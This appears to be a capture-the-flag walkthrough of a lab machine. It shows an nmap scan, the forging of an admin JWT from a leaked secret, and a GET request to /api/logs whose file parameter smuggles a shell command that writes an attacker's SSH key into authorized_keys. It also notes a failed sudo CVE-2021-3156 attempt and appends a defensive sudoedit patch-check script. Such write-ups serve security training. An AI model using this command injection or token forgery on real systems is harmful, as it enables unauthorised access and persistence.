~$ sudo nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.11.120
Nmap scan report for 10.10.11.120
Host is up (0.40s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:af:61:44:10:89:b9:53:f0:80:3f:d7:19:b1:e2:9c (RSA)
| 256 95:ed:65:8d:cd:08:2b:55:dd:17:51:31:1e:3e:18:12 (ECDSA)
|_ 256 33:7b:c1:71:d3:33:0f:92:4e:83:5a:1f:52:02:93:5e (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: DUMB Docs
|_http-server-header: nginx/1.18.0 (Ubuntu)
3000/tcp open http Node.js (Express middleware)
|_http-title: DUMB Docs
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=3/17%OT=22%CT=1%CU=44381%PV=Y%DS=2%DC=T%G=Y%TM=62332FE
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=FA%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 256/tcp)
HOP RTT ADDRESS
1 397.90 ms 10.10.14.1
2 397.73 ms 10.10.11.120
Stats: 0:01:12 elapsed; 1 hosts completed (1 up), 0 undergoing Script Post-Scan
NSE Timing: About 0.00% done
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.82 seconds
auth-token
The auth-token header carries a JWT. The token is signed with the environment variable TOKEN_SECRET as the JWT key; TOKEN_SECRET was removed but never changed, so signing with that key yields a JWT for theadmin:
> const TOKEN_SECRET='gXr67TtoQL8TShUc8XYsK2HvsBYfyQSFCFZe4MQp7gRpFuMkKjcM72CNQN4fMfbZEKx4i7YiWuNAkmuTcdEriCMm9vPAYkhpwPTiuVwVhvwE'
undefined
> const jwt = require('jsonwebtoken')
undefined
> jwt.sign({ _id: '123', name: 'theadmin' , email:'aa'}, TOKEN_SECRET )
'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA'
~/.ssh/authorized_keys
GET /api/logs?file=index.js%3becho%20'ssh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQDuXAKp6lilCgdGpsrip1Zx8Ex%2bwC8Y9OlElgzsCs2gyh2RleVA26cwq2uLwF%2bO4lVtLunxGbvcN97gCVKb%2bEstkjSRmMkhCrmb7hRO3mvvul770f2333iMcd4xtQCTBXbYjdFdR7IQAp8p9iSrYUeyU%2fLnKMFeboKRY4kFhIuSvavy5mflJalTKq%2bBhGZd3DCKHk%2bcbH4FLcoMy9hTy3Js%2bzaw28Td%2bLo4oTm2LP%2fW2w%2fwopgCy5FWv531udIYT8AQxX47IOSloRqOeRfyX3SV9jdXVv0AutPq1REykxW14Clv2xbR%2fddQfcCmbMBSp8lXpR%2btkhDNdk82rawaX7HJMmJAY%2bg%2fQEgoEePOEfppawCsFwdzTdAoTCU2kfl6CNx3rB%2bF9CAP8Twgom5Mt%2flYPi2N%2fZEhRo2OCK9Sx5PZx79UAHnO0WeQc5BWeUYJrBacBuvnaFCejcJHFP5LNti5xMI1FvmNMwlFO7%2bPsmIZnZfSxbhg9FP%2fy1ixD3eoymk%3d%20eethan1%40Magdalene2'%20%3e%20%2fhome%2fdasith%2f.ssh%2fauthorized_keys HTTP/1.1
auth-token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJfaWQiOiIxMjMiLCJuYW1lIjoidGhlYWRtaW4iLCJlbWFpbCI6ImFhIiwiaWF0IjoxNjQ3NTIyOTM1fQ.mAAgzJjzJ8eSdMNTjzh4RwfYS4TUFmS3uCMwxjuGObA
Host: 10.10.11.120:3000
ssh -i ~/tmp/id_rsa dasith@10.10.11.120
linpeas.sh
It shows Sudo version 1.8.31, which has CVE-2021-3156. I gave https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit a try without success; the README specifically notes using sudoedit to determine whether it can be exploited, and after trying that, it cannot be exploited.
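Added example (not from this note or from the linked repository): a POSIX shell check that applies the sudoedit probe described in the Qualys advisory for CVE-2021-3156; the README the note mentions refers to a sudoedit check, which is assumed here to be the same probe. It exists because the version string alone misleads: distributions backport the fix, so a sudo that reports 1.8.31 can be fully patched, which matches what the note found. The function names are the example's own.

```shell
#!/bin/sh
# Added example: verify whether the installed sudo is patched for CVE-2021-3156
# by probing sudoedit instead of trusting `sudo --version`.

# Classify the first stderr line of `sudoedit -s /`, per the upstream advisory:
#   starts with "usage:"    -> patched   (the -s flag is rejected up front)
#   starts with "sudoedit:" -> vulnerable (the flag was accepted)
classify_sudoedit_output() {
  case "$1" in
    usage:*)    echo patched ;;
    sudoedit:*) echo vulnerable ;;
    *)          echo unknown ;;
  esac
}

# Run the probe on this host as an unprivileged user. The probe does not
# elevate or modify anything; it only observes how sudoedit parses its flags.
check_sudo_cve_2021_3156() {
  if ! command -v sudoedit >/dev/null 2>&1; then
    echo "sudoedit not installed"
    return 0
  fi
  version=$(sudo --version 2>/dev/null | head -n 1)
  out=$(sudoedit -s / 2>&1 </dev/null | head -n 1)
  printf 'version line: %s\n' "$version"
  printf 'probe output: %s\n' "$out"
  printf 'result: %s\n' "$(classify_sudoedit_output "$out")"
}

# Usage: sh check_sudo.sh --run   (the probe is only executed on request)
if [ "${1:-}" = "--run" ]; then
  check_sudo_cve_2021_3156
fi
```

A "patched" result on a host whose version line still reads 1.8.31 is the expected outcome for a distribution package that carries the backported fix; a vulnerability scanner that matches only on the version string will keep reporting it.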